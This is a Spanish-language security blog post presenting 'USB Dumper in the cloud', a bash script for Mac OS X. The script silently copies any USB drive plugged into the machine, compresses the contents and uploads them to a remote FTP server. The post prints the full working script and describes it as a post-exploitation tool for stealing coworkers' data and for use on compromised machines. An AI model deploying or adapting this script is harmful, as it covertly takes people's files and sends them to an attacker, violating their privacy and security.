Twitter

25 octubre 2011

USB Dumper in the cloud: Roba datos de pendrives por USB y mándalos a la nube (a un servidor FTP)

USB Dumper in the cloud: Roba datos de pendrives por USB y mándalos a la nube (a un servidor FTP):
USBDumper es un pequeño script desarrollado en Octubre del año pasado para Seguridad Apple desde el equipo de auditoría de aplicaciones web de Informática64, y cuya finalidad era demostrar en una prueba de concepto (POC), que se pueden robar los datos de los pendrives que se conectan a nuestro equipo Mac OS X fácilmente, y luego sacar el "jugo" de los datos robados. Tal y como se comentó en el artículo USB Dumping en Mac OS X, este tipo de ataques resulta muy efectivo en entornos de trabajo en donde un compañero te pide la impresión de un documento, o la copia de determinado fichero de un dispositivo extraíble, siempre bajo su supervisión. Sin embargo, desde el momento en que se conecta el pendrive a nuestro querido Mac OS X, éste empezará a realizar un copiado del pendrive de forma totalmente transparente en el directorio /tmp/Volumes/. La nueva versión de este programa para hacer USB Dumping, que ha sido desarrollada a petición de un lector asiduo de Seguridad Apple, incorpora la nueva funcionalidad de comprimir el contenido del dispositivo y subirlo a un servidor FTP. De este modo, el atacante – o ladrón de datos – dispondrá de sus backups en la nube. Sabemos que podríamos haber resuelto el problema de sinconización con la nube añadiendo la carpeta donde se copian los backups a la lista de carpetas a sincronizar con algún servicio de online backup, como Dropbox o Zendal Backup, pero entonces no podría usarse como una herramienta de post-explotación en una máquina. De esta forma, el script serviría para controlar una máquina explotada o podría ser una aplicación ideal para complementar un ataque David Hasselhoff, ya que además de hacerle una pequeña "broma" en su escritorio, estará subiendo al servidor FTP el contenido de sus dispositivos, a los cuales tendremos acceso incluso sin necesidad de que el usuario se vuelva a dejar desbloqueado el equipo. A continuación mostramos el código de la nueva versión de USB Dumper "in the cloud" , el cual requiere que se editen las variables SERVER, USERNAME y PASSWORD, localizadas en las primeras líneas del script.
Figura 1: USB Dumper enviando el backup a la nube
A continuación mostramos el código de la nueva versión de USB Dumper in the cloud, al cual es necesario editarle las variables SERVER, USERNAME y PASSWORD localizados en las primeras líneas del script.
#!/bin/bash
#www.seguridadapple.com
SERVER="host"
USERNAME="user"
PASSWORD="password"
function saveDefaultDevices()
{
rm -rf /tmp/usblist /tmp/Volumes
mkdir /tmp/Volumes
for vol in /Volumes/*
do
echo $vol >> /tmp/usblist
echo "Detecting $vol as default"
done
}
function checkDevices()
{
for vol in /Volumes/*
do
aux=`cat /tmp/usblist |grep -i "$vol"`
aux=`echo $?`
if [ $aux -eq 1 ]; then
nombre=`echo $vol | awk -F "/" '{print $3}'`
echo $vol >> /tmp/usblist
mkdir "/tmp$vol"?
echo "[+] Dumping $vol in /tmp$vol"
sleep 1
cp -R "$vol" "/tmp/Volumes/"
auxVol="/tmp/$nombre.zip"
rm -rf $auxVol
echo "Compressing files [ /tmp$vol in $auxVol ]"
zip -r "$auxVol" "/tmp$vol" > /dev/null
echo "Uploading to FTP"
ftp -n -i $SERVER <<EOF
user $USERNAME $PASSWORD
binary
put "$auxVol" "$nombre"
quit
EOF
echo "[+] Done"
fi
done
}
saveDefaultDevices
while [ 1 ]; do
checkDevices
sleep 1
done

No hay comentarios:

Publicar un comentario